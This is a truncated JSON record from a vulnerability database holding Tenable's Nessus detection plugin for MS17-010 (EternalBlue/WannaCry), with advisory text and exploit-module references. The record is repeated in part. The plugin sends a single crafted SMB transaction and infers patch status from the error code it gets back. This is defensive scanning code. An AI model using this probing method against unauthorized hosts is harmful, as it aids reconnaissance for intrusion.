"vector": "NONE", "modified": "2021-08-12T12:17:27", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. 
An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # 
https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. 
For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t 
raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! 
isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. 
For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS: CANVAS", "Metasploit: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption"]}, "lastseen": "2021-08-12T12:17:27", "differentElements": ["exploitableWith", "nessusSeverity"], "edition": 8}, {"bulletin": {"id": "MS17-010.NASL", "hash": "c5c146b305e2f4b1abd96ec9c5d3d69f", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?4c7e0cf3", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?065561d0", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?b9d9ebf9", "https://github.com/stamparm/EternalRocks/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?234f8ef8", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-19T12:37:40", "history": [], "viewCount": 7174, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "kaspersky", "idList": 
["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", 
"SMNTC-96703", "SMNTC-96709"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": 
"2021-08-19T12:37:40", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-08-19T12:37:40", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper 
handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # 
https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. 
For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
